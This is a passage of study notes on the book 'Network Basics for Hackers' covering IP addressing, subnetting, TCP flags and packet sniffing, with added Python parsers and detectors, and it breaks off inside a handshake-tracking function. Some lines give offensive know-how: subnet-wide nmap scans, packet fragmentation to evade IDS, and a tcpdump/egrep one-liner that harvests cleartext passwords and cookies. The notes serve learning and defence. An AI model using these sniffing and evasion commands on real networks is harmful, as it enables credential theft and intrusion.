akash98-ss/Networking-Notes

Network Basics for Hackers - Complete Notes

Book: Network Basics for Hackers · OccupyTheWeb (OTW) · InfoSec Press 2023
Platform: Kali Linux


Table of Contents

# Chapter
1 Network Basics
2 Subnetting & CIDR
3 Network Analysis
4 Linux Firewalls
5 Wi-Fi Networks
6 Bluetooth Networks
7 ARP
8 DNS
9 SMB
10 SMTP
11 SNMP
12 HTTP
13 Automobile Networks
14 SCADA/ICS
15 RF Networks & SDR
A Appendix - Cyber Warrior Wisdom

Chapter 1 - Network Basics


Table of Contents

  1. IP Addresses
  2. Classes of IP Addresses
  3. Public vs Private IP
  4. DHCP
  5. NAT
  6. Ports
  7. TCP/IP & Protocols
  8. IP Header
  9. TCP Header & Flags
  10. TCP Three-Way Handshake
  11. UDP
  12. Network Topologies
  13. OSI Model
  14. Exercises

1. IP Addresses

Every digital device is assigned an IP address, like a house address for the internet.

  • Current standard: IPv4 (Internet Protocol version 4)
  • Made up of 32 bits split into 4 octets (8 bits each)
  • Each octet = decimal value 0 to 255 (2⁸ = 256)
Binary:   11000000 . 10101000 . 00000001 . 01100101
Decimal:     192   .    168   .     1    .    101
             └── Example IP: 192.168.1.101

2. Classes of IP Addresses

Class Range Purpose
A 0.0.0.0 – 127.255.255.255 Very large networks
B 128.0.0.0 – 191.255.255.255 Medium networks
C 192.0.0.0 – 223.255.255.255 Small LANs (most common)

Subnet masks vary per class; covered in Chapter 2.


3. Public vs Private IP Addresses

Problem: IPv4 has only ~4.3 billion addresses for 7.5 billion people + devices.
Solution: Reuse private IP addresses inside LANs; they don't route on the internet.

Private IP Ranges

Range Notes
192.168.0.0 – 192.168.255.255 Most home routers
10.0.0.0 – 10.255.255.255 Enterprise LANs
172.16.0.0 – 172.16.255.255 Mid-scale networks

Hacker Note: ifconfig on Kali will show your private IP. You need NAT (below) to reach the internet.
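Added example (mine, not from the notes or the book): a small Python classifier that does what sections 1 to 3 ask you to do by hand for one address, rendering it in binary, assigning its classful class and checking it against the RFC 1918 private blocks. It goes slightly beyond the tables above: classes D and E are included, and the middle private block is taken as 172.16.0.0/12 (172.16.0.0 to 172.31.255.255), which is the range RFC 1918 actually reserves. The sample addresses at the bottom are constructed.

```python
import ipaddress

# RFC 1918 private blocks. The middle block is 172.16.0.0/12
# (172.16.0.0 - 172.31.255.255), wider than a single 172.16.x.x /16.
PRIVATE_BLOCKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def to_binary(ip: str) -> str:
    """Render a dotted-quad IPv4 address as four 8-bit groups."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a valid IPv4 address: {ip}")
    return ".".join(f"{o:08b}" for o in octets)


def ip_class(ip: str) -> str:
    """Classful class from the first octet (A-C as in the notes, plus
    D = multicast 224-239 and E = reserved 240-255)."""
    first = int(ip.split(".")[0])
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"
    return "E"


def is_private(ip: str) -> bool:
    """True if the address lies in any RFC 1918 block (not routed on the internet)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in block for block in PRIVATE_BLOCKS)


def describe(ip: str) -> dict:
    """Binary form, class and public/private status for one address."""
    return {
        "ip": ip,
        "binary": to_binary(ip),
        "class": ip_class(ip),
        "private": is_private(ip),
    }


if __name__ == "__main__":
    # Constructed sample addresses, one per interesting case
    for sample in ["192.168.1.101", "172.20.5.9", "172.31.0.1", "172.32.0.1", "8.8.8.8"]:
        print(describe(sample))
```

Note that 172.32.0.1 comes back public: it is outside the /12, which is the kind of boundary case the classful tables hide.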


4. DHCP

Dynamic Host Configuration Protocol: automatically assigns IP addresses to devices on a LAN.

Device connects → sends request → DHCP server assigns IP for a "lease" period
  • IP assignment is temporary (dynamic lease)
  • On reconnect, you may get a different IP in the same range (e.g. 192.168.0.x)

5. NAT

Network Address Translation lets multiple private-IP devices share one public IP.

[PC: 192.168.1.10] ─┐
[PC: 192.168.1.11] ────► [NAT Router: 203.x.x.x] ──► Internet
[PC: 192.168.1.12] ─┘

How it works:

  1. Device sends packet → NAT swaps private IP → public IP, records in table
  2. Packet travels internet with public IP
  3. Response arrives → NAT looks up table → forwards to correct private device

The devices never know translation is happening.


6. Ports

Ports are sub-addresses. IP = building address. Port = apartment number.

  • 65,536 total ports (2¹⁶)
  • First 1,024 = well-known "common ports"

Must-Know Ports

Port Protocol Service
21 TCP FTP
22 TCP SSH
23 TCP Telnet
25 TCP SMTP (Email)
53 UDP/TCP DNS
80 TCP HTTP
110 TCP POP3
143 TCP IMAP
443 TCP HTTPS
445 TCP SMB
3389 TCP RDP

Scan Ports with nmap

# TCP connect scan
sudo nmap -sT <target-IP>

# UDP scan
sudo nmap -sU <target-IP>

7. TCP/IP & Protocols

Protocols = agreed-upon rules for communication, defined in RFCs (Request for Comments).

Protocol Full Name Purpose
IP Internet Protocol Addressing & routing
TCP Transmission Control Protocol Reliable, ordered delivery
UDP User Datagram Protocol Fast, connectionless
HTTP HyperText Transfer Protocol Web browsing
SMTP Simple Mail Transfer Protocol Email
DNS Domain Name System Name → IP resolution
FTP File Transfer Protocol File transfer
SNMP Simple Network Mgmt Protocol Network device management

8. IP Header Anatomy

 0               1               2               3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Key Fields for Hackers

Field Purpose Hacker Use
TTL Hops before expiry OS fingerprinting (Linux ≈ 64, Windows ≈ 128, Cisco ≈ 255)
Protocol Inner protocol (TCP=6, UDP=17, ICMP=1) Identify traffic type
IP Flags Fragmentation (DF/MF bits) Evade IDS/firewalls via fragmentation
Identification Unique packet ID Reassemble fragmented packets
Source/Dest IP Sender & receiver Trace origin; spoofing
Header Checksum Integrity Detect tampering

⚠️ Attack: Manipulate IP Flags with nmap or hping3 to fragment packets and evade detection.
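Added example (mine, not the book's): parse a raw IPv4 header with Python's struct module, recover the fields from the Key Fields table (TTL, protocol, DF/MF flags, identification, addresses), verify the header checksum and apply the TTL heuristic. build_ipv4 exists only to construct sample input with documentation addresses; no packets are sent.

```python
import struct

PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's complement of the one's-complement sum
    of every 16-bit word, computed with the checksum field itself set to zero."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(packet: bytes) -> dict:
    """Pull the fields from the Key Fields table out of a raw IPv4 header."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, ident, flags_frag,
     ttl, proto, csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a complete IPv4 header")
    header = packet[:ihl]
    zeroed = header[:10] + b"\x00\x00" + header[12:]   # checksum field is bytes 10-11
    return {
        "ttl": ttl,
        "protocol": PROTOCOLS.get(proto, str(proto)),
        "df": bool(flags_frag & 0x4000),               # Don't Fragment
        "mf": bool(flags_frag & 0x2000),               # More Fragments
        "frag_offset": flags_frag & 0x1FFF,
        "identification": ident,
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
        "total_length": total_len,
        "checksum_ok": ipv4_checksum(zeroed) == csum,
    }


def guess_os_by_ttl(ttl: int) -> str:
    """The TTL heuristic from the table: observed TTL = initial TTL minus hops,
    so pick the nearest common initial value above it. A rough guess, not proof."""
    if ttl <= 64:
        return "Linux/Unix (initial TTL 64)"
    if ttl <= 128:
        return "Windows (initial TTL 128)"
    return "Cisco/network device (initial TTL 255)"


def build_ipv4(src: str, dst: str, ttl: int = 64, proto: int = 6,
               ident: int = 0x1234, df: bool = True, payload_len: int = 0) -> bytes:
    """Construct a header with a valid checksum. Sample input only; nothing is sent."""
    flags_frag = 0x4000 if df else 0
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      flags_frag, ttl, proto, 0, src_b, dst_b)
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]


if __name__ == "__main__":
    # Constructed packet: documentation addresses, TTL 57 = 64 minus 7 hops
    pkt = build_ipv4("192.168.1.101", "203.0.113.10", ttl=57)
    fields = parse_ipv4(pkt)
    print(fields)
    print("likely OS:", guess_os_by_ttl(fields["ttl"]))
    tampered = pkt[:8] + bytes([pkt[8] + 1]) + pkt[9:]   # bump TTL without fixing checksum
    print("tampered checksum ok?", parse_ipv4(tampered)["checksum_ok"])
```

The tampered packet at the end shows what the Header Checksum row means in practice: change any header byte without recomputing and the check fails, which is why a router would drop it.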


9. TCP Header & Flags

The 6 TCP Flags

Flag Name Purpose Hacker Use
SYN Synchronize Open new connection SYN flood (DoS), stealth scan (nmap -sS)
ACK Acknowledge Confirm packet receipt ACK scan to map firewall rules
FIN Finish Graceful close FIN scan: closed ports reply RST
RST Reset Hard abort TCP reset attacks to kill sessions
URG Urgent Immediate processing Rarely used offensively
PSH Push Skip buffer → app Interactive sessions (SSH, Telnet)

🎯 Tip: Illegal flag combos (SYN+FIN, all flags = XMAS scan) can fingerprint OS or evade detection. Use nmap or hping3.

Window Size & OS Fingerprinting

The Window Size field + TTL + DF flag can identify sender OS with ~80% accuracy.
Tool: p0f, passive OS fingerprinting (no packets sent to target).
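Added example (mine, not from the book): decode the flags byte of a TCP header into the six flag names from the table, then classify each segment so that the illegal combinations from the tip (NULL, XMAS, SYN+FIN) stand out from legitimate traffic. The notes describe XMAS as "all flags"; nmap's -sX actually sets FIN, PSH and URG, so both forms are matched. The sample segments are constructed in memory; nothing is sent.

```python
import struct
from collections import Counter

# Flag bits in the low six bits of the TCP flags byte (RFC 793 order)
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def decode_flags(flag_byte: int) -> set:
    """Turn the flags byte into the set of flag names that are set."""
    return {name for name, bit in FLAG_BITS.items() if flag_byte & bit}


def classify_flags(flags: set) -> str:
    """Name the scan signatures built from illegal or unusual flag combinations.
    Legitimate traffic (SYN, SYN+ACK, ACK, PSH+ACK, FIN+ACK, ...) comes back as 'normal'."""
    if not flags:
        return "NULL scan (no flags)"
    if flags == set(FLAG_BITS):
        return "XMAS scan (all six flags)"
    if flags == {"FIN", "PSH", "URG"}:
        return "XMAS scan (FIN+PSH+URG, as sent by nmap -sX)"
    if {"SYN", "FIN"} <= flags:
        return "illegal SYN+FIN"
    if {"SYN", "RST"} <= flags:
        return "illegal SYN+RST"
    if flags == {"FIN"}:
        return "FIN scan (bare FIN without ACK)"
    return "normal"


def parse_tcp(segment: bytes) -> dict:
    """Decode the fixed 20-byte TCP header: ports, sequence numbers, flags, window size."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_res, flag_byte, window, _csum, _urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    return {
        "sport": sport,
        "dport": dport,
        "seq": seq,
        "ack": ack,
        "data_offset": (off_res >> 4) * 4,       # header length in bytes
        "flags": decode_flags(flag_byte & 0x3F),  # mask off ECE/CWR
        "window": window,
    }


def build_tcp(sport: int, dport: int, flags, window: int = 64240) -> bytes:
    """Construct a minimal TCP header (sample input only, nothing is sent)."""
    flag_byte = sum(FLAG_BITS[f] for f in flags)
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flag_byte, window, 0, 0)


def scan_report(segments) -> Counter:
    """Count verdicts over a batch of segments; anything but 'normal' deserves a look."""
    return Counter(classify_flags(parse_tcp(s)["flags"]) for s in segments)


if __name__ == "__main__":
    # Constructed batch: one normal handshake plus three scan probes against port 22
    sample = [
        build_tcp(40000, 80, ["SYN"]),
        build_tcp(80, 40000, ["SYN", "ACK"]),
        build_tcp(40000, 80, ["ACK"]),
        build_tcp(40001, 22, []),
        build_tcp(40002, 22, ["FIN", "PSH", "URG"]),
        build_tcp(40003, 22, ["SYN", "FIN"]),
    ]
    for verdict, n in scan_report(sample).items():
        print(f"{n:3d}  {verdict}")
```

A bare SYN is reported as normal on purpose: on its own it is just a connection attempt, and only the volume of SYNs without the rest of the handshake (next section) says it is a scan or a flood.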


10. TCP Three-Way Handshake

Every TCP connection requires a 3-way handshake before data transfer:

CLIENT                                SERVER
  │                                     │
  │─────────── SYN ───────────────────► │  "Hello, I want to talk"
  │                                     │
  │◄────────── SYN-ACK ─────────────── │  "Hi, I'm ready"
  │                                     │
  │─────────── ACK ───────────────────► │  "Great, let's go"
  │                                     │
  │═══════════ DATA TRANSFER ══════════ │

⚠️ SYN Flood Attack: Send massive SYN packets without completing ACK → server's connection table exhausts → Denial of Service (DoS).


11. UDP

User Datagram Protocol: connectionless, "fire and forget."

CLIENT                          SERVER
  │                               │
  │──── DATAGRAM ────────────────►│   No ACK. No guarantee.

  • Faster than TCP (no overhead, no handshake)
  • Unreliable: packets can be lost with no notification
  • Best for: streaming, DNS queries, SNMP, NTP

# UDP port scan (slower: no RST from open ports, nmap waits for timeout)
sudo nmap -sU <target-IP>

12. Network Topologies

Bus Topology

PC1 ──── PC2 ──── PC3 ──── PC4
         (single shared bus)
  • ✅ Cheap & simple
  • ❌ Congestion on busy networks

Star Topology (Most common for LANs)

         PC1
          │
PC4 ─── HUB ─── PC2
          │
         PC3
  • ✅ Independent connections; one failure doesn't affect others
  • ❌ Hub/switch = single point of failure

Ring Topology

PC1 → PC2 → PC3 → PC4 → (back to PC1)
  • ✅ Simple, inexpensive
  • ❌ One break = entire network down

Mesh Topology (How the internet works)

PC1 ─── PC2
 │  ╲ ╱  │
 │   ╳   │
 │  ╱ ╲  │
PC3 ─── PC4
  • ✅ Highly resilient, many redundant paths
  • ❌ Most expensive, complex
  • Apps like Briar use mesh over Wi-Fi/Bluetooth for off-grid comms

13. The OSI Model

The Open Systems Interconnection model: 7 layers describing how network communication works.

Mnemonic (top → bottom): All People Seem To Need Data Processing
Mnemonic (bottom → top): Please Don't Throw Sausage Pizza Away

OSI Layers + Attack Map

┌──────────┬──────────────┬────────────────────────────┬────────────────────────┐
│  Layer 7 │ APPLICATION  │ HTTP, FTP, DNS, SMTP       │ ◄ Exploits             │
├──────────┼──────────────┼────────────────────────────┼────────────────────────┤
│  Layer 6 │ PRESENTATION │ SSL/TLS, Encryption        │ ◄ Phishing             │
├──────────┼──────────────┼────────────────────────────┼────────────────────────┤
│  Layer 5 │ SESSION      │ NetBIOS, RPC, SMB          │ ◄ Session Hijacking    │
├──────────┼──────────────┼────────────────────────────┼────────────────────────┤
│  Layer 4 │ TRANSPORT    │ TCP, UDP                   │ ◄ Reconnaissance       │
├──────────┼──────────────┼────────────────────────────┼────────────────────────┤
│  Layer 3 │ NETWORK      │ IP, ICMP, Routing          │ ◄ MitM Attacks         │
├──────────┼──────────────┼────────────────────────────┼────────────────────────┤
│  Layer 2 │ DATA LINK    │ Ethernet, ARP, MAC         │ ◄ MAC Spoofing         │
├──────────┼──────────────┼────────────────────────────┼────────────────────────┤
│  Layer 1 │ PHYSICAL     │ Cables, Wi-Fi, Signals     │ ◄ Sniffing             │
└──────────┴──────────────┴────────────────────────────┴────────────────────────┘

Layer Primary Attack
Application (7) Exploits: inject code into apps
Presentation (6) Phishing: malicious email links
Session (5) Session Hijacking: take over a legitimate session
Transport (4) Reconnaissance: port scanning
Network (3) Man-in-the-Middle (MitM): intercept traffic
Data Link (2) MAC Spoofing: fake hardware address
Physical (1) Sniffing: capture raw network traffic

Exercises

  1. What is the difference between public and private IP addresses? Is 172.16.242.63 public or private?
  2. Run ifconfig; what IP does your system use?
  3. Run sudo nmap -sT 127.0.0.1 β€” what ports are open?
  4. Name the 6 TCP flags and what each one does.
  5. What are the most common attacks against each OSI layer?

Quick Reference

IP CLASSES:       A: 0–127.x.x.x  |  B: 128–191.x.x.x  |  C: 192–223.x.x.x
PRIVATE IPs:      10.x.x.x  |  172.16.x.x  |  192.168.x.x
TCP FLAGS:        SYN  ACK  FIN  RST  URG  PSH
TTL BY OS:        Linux ≈ 64  |  Windows ≈ 128  |  Cisco ≈ 255


Chapter 2 - Subnetting & CIDR Notation


Why Subnetting?

IPv4 gives us 32 bits of address space. Subnetting lets admins divide a large network into smaller sub-networks to:

  • Use IP space more efficiently
  • Reduce broadcast traffic
  • Create separate security zones
  • Avoid putting thousands of devices on one flat network

Subnets

A subnet is a network within a network (Class A, B, or C). Subnets are created by "borrowing" bits from the host portion of an IP address to extend the network ID.

Class Default Network Bits Default Host Bits
A 8 24
B 16 16
C 24 8

Subnetting lets us create network IDs of any size, not just the defaults above.


Subnet Masks

A subnet mask tells you which bits belong to the network and which belong to the host.

  • Bit = 1 → part of the network
  • Bit = 0 → part of the host
IP Address:    192 .  168 .    1 .  101
Binary:     11000000.10101000.00000001.01100101

Subnet Mask:   255 .  255 .  255 .    0
Binary:     11111111.11111111.11111111.00000000
                                      └── host portion

Network ID:  192.168.1.0   (AND of IP & mask)
Host range:  192.168.1.1  –  192.168.1.254
Broadcast:   192.168.1.255

Bitwise AND operation determines the network address:

  11000000.10101000.00000001.01100101  (IP)
& 11111111.11111111.11111111.00000000  (mask)
= 11000000.10101000.00000001.00000000  (network = 192.168.1.0)

CIDR Notation

CIDR = Classless Inter-Domain Routing

Format: IP/prefix-length where prefix-length = number of network bits

192.168.1.0/24   →  24 network bits, 8 host bits  (255.255.255.0)
10.0.0.0/8       →  8 network bits, 24 host bits  (255.0.0.0)
172.16.0.0/16    →  16 network bits, 16 host bits (255.255.0.0)

Worked Example - Subnetting a Class C

Scenario: You have 192.168.1.0 (Class C, 254 hosts). You need 5 subnets with max 30 hosts each.

Step 1: Borrow bits from the host portion to create subnets.

  • 3 borrowed bits → 2³ = 8 subnets (-2 reserved = 6 usable)
  • 5 remaining host bits → 2⁵ = 32 addresses (-2 reserved = 30 hosts) ✅

Step 2: Calculate the new subnet mask.

Default /24:   11111111.11111111.11111111.00000000
Borrow 3 bits: 11111111.11111111.11111111.11100000
New mask:      255.255.255.224   →   /27

Step 3: The 6 usable subnets are:

Subnet Network Host Range Broadcast
1 192.168.1.0/27 .1 – .30 .31
2 192.168.1.32/27 .33 – .62 .63
3 192.168.1.64/27 .65 – .94 .95
4 192.168.1.96/27 .97 – .126 .127
5 192.168.1.128/27 .129 – .158 .159
6 192.168.1.160/27 .161 – .190 .191

CIDR Quick Reference

CIDR Subnet Mask Hosts per Subnet
/24 255.255.255.0 254
/25 255.255.255.128 126
/26 255.255.255.192 62
/27 255.255.255.224 30
/28 255.255.255.240 14
/29 255.255.255.248 6
/30 255.255.255.252 2
/16 255.255.0.0 65,534
/8 255.0.0.0 16,777,214

Formula: Hosts per subnet = 2^(32 - prefix) - 2
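Added example (mine, not from the book): the subnet arithmetic of this chapter in Python, using the standard library's ipaddress module. It performs the bitwise AND from the Subnet Masks section, evaluates the hosts formula above, converts a dotted mask to a prefix, and reproduces the worked example by carving 192.168.1.0/24 into /27 blocks and printing each block's host range and broadcast. It prints all 8 blocks; the notes' table keeps 6 after dropping the first and last.

```python
import ipaddress


def usable_hosts(prefix: int) -> int:
    """The notes' formula: 2^(32 - prefix) - 2 (network and broadcast reserved).
    /31 and /32 have no room for that pair, so they yield 0 here."""
    return max(2 ** (32 - prefix) - 2, 0)


def network_id(ip: str, mask: str) -> str:
    """Bitwise AND of address and mask, exactly the derivation in the notes."""
    ip_int = int(ipaddress.ip_address(ip))
    mask_int = int(ipaddress.ip_address(mask))
    return str(ipaddress.ip_address(ip_int & mask_int))


def mask_to_prefix(mask: str) -> int:
    """Dotted mask to CIDR prefix length, e.g. 255.255.255.224 -> 27."""
    return ipaddress.ip_network(f"0.0.0.0/{mask}").prefixlen


def subnet_info(cidr: str) -> dict:
    """Network, mask, usable host range and broadcast for a CIDR block.
    strict=False lets you pass a host address such as 192.168.1.101/24."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen >= 31:
        first = last = None
    else:
        first = str(net.network_address + 1)
        last = str(net.broadcast_address - 1)
    return {
        "network": str(net.network_address),
        "prefix": net.prefixlen,
        "netmask": str(net.netmask),
        "first_host": first,
        "last_host": last,
        "broadcast": str(net.broadcast_address),
        "usable_hosts": usable_hosts(net.prefixlen),
    }


def split_network(cidr: str, new_prefix: int) -> list:
    """Borrow bits: carve a block into equal subnets with the longer prefix."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(sub) for sub in net.subnets(new_prefix=new_prefix)]


if __name__ == "__main__":
    print("network ID:", network_id("192.168.1.101", "255.255.255.0"))
    print("/27 mask:", mask_to_prefix("255.255.255.224"))
    for sub in split_network("192.168.1.0/24", 27):
        info = subnet_info(sub)
        print(f"{sub:18} {info['first_host']:>15} - {info['last_host']:<15} "
              f"bcast {info['broadcast']}  ({info['usable_hosts']} hosts)")
```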


Hacker Relevance

  • Subnet masks tell you what other IPs are on the same LAN as a compromised host
  • Use ifconfig or ip addr to see your subnet: 192.168.1.0/24 means scan .1 to .254
  • CIDR notation is used everywhere in firewall rules, routing tables, nmap scans:
# Scan an entire /24 subnet
sudo nmap -sT 192.168.1.0/24

# Block an entire subnet with iptables
sudo iptables -A INPUT -s 10.0.0.0/8 -j DROP

Exercises

  1. What subnet mask gives you 14 usable hosts per subnet?
  2. How many subnets can you create from 10.0.0.0/8 using a /24 prefix?
  3. What is the broadcast address of 192.168.5.64/26?
  4. Convert 255.255.255.192 to CIDR notation.


Chapter 3 - Network Analysis


CLI Network Tools

ifconfig

ifconfig                  # View all interfaces

Key output fields:

  1. IPv4 private IP address
  2. Netmask
  3. Broadcast IP
  4. IPv6 address
  5. MAC address
  6. Loopback (127.0.0.1)

ping

ping hackers-arise.com    # Test if host is alive (by domain)
ping 185.230.63.107       # Test by IP

Sends ICMP echo requests. If the host responds, it's up.

netstat

netstat -a                # All connections
netstat -t                # TCP only
netstat -u                # UDP only
netstat -l                # Listening ports only
netstat -a | grep http    # Filter for HTTP connections

Shows every connection coming in or going out. Useful for finding malware phoning home.

ss

ss                        # Similar to netstat, more info, better format
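Added example (mine, not from the book): a Python parser for netstat -tan style output that picks out the ESTABLISHED connections whose far end is outside your own LAN and loopback ranges, then flags the ones on ports you would not expect from normal use. This is the "malware phoning home" check from the netstat section done over a saved listing rather than by eye. The listing below is constructed; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for internet hosts, and EXPECTED_PORTS is my own list, which you would tune to your environment.

```python
import ipaddress

# Far-end addresses in these blocks are LAN or local traffic, not "phoning home"
LOCAL_BLOCKS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Ports you expect outbound connections on; anything else gets a second look (assumed list)
EXPECTED_PORTS = {22, 25, 53, 80, 110, 143, 443, 445, 993, 995, 3389}


def parse_netstat(text: str) -> list:
    """Parse `netstat -tan`-style rows into dicts; skips headers and non-TCP rows."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp"):
            continue
        local_host, local_port = parts[3].rsplit(":", 1)
        foreign_host, foreign_port = parts[4].rsplit(":", 1)
        rows.append({
            "local": local_host,
            "local_port": local_port,
            "foreign": foreign_host,
            "foreign_port": None if foreign_port == "*" else int(foreign_port),
            "state": parts[5],
        })
    return rows


def is_local(host: str) -> bool:
    """True for loopback and RFC 1918 addresses (IPv6 addresses never match the v4 blocks)."""
    addr = ipaddress.ip_address(host)
    return addr.is_loopback or any(addr in block for block in LOCAL_BLOCKS)


def external_connections(rows: list) -> list:
    """ESTABLISHED connections whose far end is not a local address."""
    return [r for r in rows if r["state"] == "ESTABLISHED" and not is_local(r["foreign"])]


def suspicious(rows: list) -> list:
    """External connections on ports you would not expect from normal use."""
    return [r for r in external_connections(rows) if r["foreign_port"] not in EXPECTED_PORTS]


# Constructed `netstat -tan` output
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.10:51234      203.0.113.55:443        ESTABLISHED
tcp        0      0 192.168.1.10:49152      10.0.0.8:445            ESTABLISHED
tcp        0      0 127.0.0.1:5432          127.0.0.1:60000         ESTABLISHED
tcp        0      0 192.168.1.10:60001      198.51.100.7:4444       ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN
"""

if __name__ == "__main__":
    for r in suspicious(parse_netstat(SAMPLE)):
        print(f"{r['foreign']}:{r['foreign_port']} from local port {r['local_port']} ({r['state']})")
```

The HTTPS session to 203.0.113.55 is external but expected; only the connection to port 4444 is reported. A port list is a weak signal on its own, so treat the output as a list of things to look up, not a verdict.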

Network Sniffers

A network sniffer (packet analyzer / protocol analyzer) intercepts and logs network traffic.

Uses:

  • Find unencrypted passwords
  • Analyze DNS/MitM attack traffic
  • Reveal sites visited, cookies, user-agent strings
  • Forensic investigation

Requirement: NIC must be in promiscuous mode, which picks up ALL packets, not just ones addressed to it.

Standard file format: .pcap (packet capture), used by Wireshark, Snort, aircrack-ng, etc.

Popular sniffers:

  • tcpdump: CLI, lightweight, great for remote/non-GUI systems
  • Wireshark: GUI, the gold standard
  • tshark: CLI version of Wireshark
  • Network Miner, Capsa, SolarWinds

Controversial: The FBI used a tool called "Carnivore" for 20+ years to sniff suspected criminals' traffic (legal, but controversial).


tcpdump

First Linux/UNIX sniffer (1988). Versatile, lightweight, perfect for remote/headless systems.

Basic Usage

sudo tcpdump                          # Capture everything
sudo tcpdump -w myoutput.cap          # Save to file

Filter by IP

sudo tcpdump host 192.168.0.114           # Traffic to/from IP
sudo tcpdump src host 192.168.0.114       # Traffic FROM IP only
sudo tcpdump dst host 192.168.0.114       # Traffic TO IP only

Filter by Port

sudo tcpdump dst port 80                  # Traffic to port 80
sudo tcpdump -vv dst port 80              # Verbose (decode headers + user-agent)

Filter by TCP Flags

sudo tcpdump 'tcp[tcpflags]==tcp-syn'     # SYN packets only
sudo tcpdump 'tcp[tcpflags]==tcp-ack'
sudo tcpdump 'tcp[tcpflags]==tcp-fin'
sudo tcpdump 'tcp[tcpflags]==tcp-rst'
sudo tcpdump 'tcp[tcpflags]==tcp-psh'
sudo tcpdump 'tcp[tcpflags]==tcp-urg'

Combine Filters

sudo tcpdump host 192.168.0.114 and port 80     # AND
sudo tcpdump port 80 or port 443                # OR
sudo tcpdump not host 192.168.0.114             # NOT / Negation

Hunt for Credentials

# Filter for cleartext passwords on common ports
sudo tcpdump port 80 or port 21 or port 25 or port 110 or port 143 or port 23 -lA \
  | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|password='

Grab User-Agent & Cookies

sudo tcpdump -vvAls0 | grep 'User-Agent'                   # -s0 = full snaplen, so headers aren't truncated
sudo tcpdump -vvAls0 | grep -E 'Set-Cookie|Host|Cookie:'   # -E so | means OR (plain grep treats it literally)

3-Way Handshake in tcpdump Output

S      = SYN
S.     = SYN-ACK  (tcpdump uses "." for ACK)
.      = ACK
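Added example (mine, not from the book): a Python tracker that reads tcpdump-style lines using the S / S. / . notation above, follows each connection through the three-way handshake from Chapter 1, and reports sources with many half-open connections, which is the symptom of the SYN flood described there. The log lines are constructed (the format follows tcpdump's default TCP line), and 203.0.113.9 is a documentation address. The threshold of 10 is my own starting value, not a measured one.

```python
import re
from collections import Counter

# Matches the address, port and flag fields of a tcpdump line such as
#   12:00:01.000000 IP 10.0.0.5.51000 > 192.168.1.20.80: Flags [S], seq 1, win 64240, length 0
LINE_RE = re.compile(
    r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)


def parse_line(line: str):
    """Return (src, sport, dst, dport, flags) or None for lines that are not TCP."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m["src"], int(m["sport"]), m["dst"], int(m["dport"]), m["flags"]


def track_handshakes(lines) -> dict:
    """Map (client, cport, server, sport) -> handshake state.
    S from the client opens SYN_SENT, S. from the server moves to SYN_RECEIVED,
    the client's bare . completes it as ESTABLISHED; any R marks it RESET."""
    state = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, sport, dst, dport, flags = parsed
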